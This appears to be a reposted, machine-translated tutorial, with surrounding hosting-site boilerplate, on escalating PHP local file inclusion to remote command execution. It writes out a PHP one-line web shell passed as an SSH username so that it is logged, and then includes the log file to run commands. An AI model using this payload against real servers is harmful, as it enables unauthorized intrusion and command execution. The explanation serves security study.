Use SSH to include execution commands

Source: Internet
Author: User

The general idea of this article is:
Use
Ssh '<pre> <? Echo system ($ _ GET ['cmd']); exit;?> '@ 10.10.11.33
Log in, And then record it in the ssh Login log, and then include the error log file with the vulnerability php to achieve the goal.
 
Contains normal log files
 
 
Use a specific one-sentence Trojan as an account to log on and generate a log file containing one sentence
 
 
Again include the log file www.2cto.com
 
 
Executed successfully
 


However, this method may not be very common,
First, the log file path is not specific.
Second, if the log file is large, it is estimated that the inclusion will not succeed.
 
 
From: http://lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/
Http://www.ayhacker.net/ayblog/read.php? 173

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.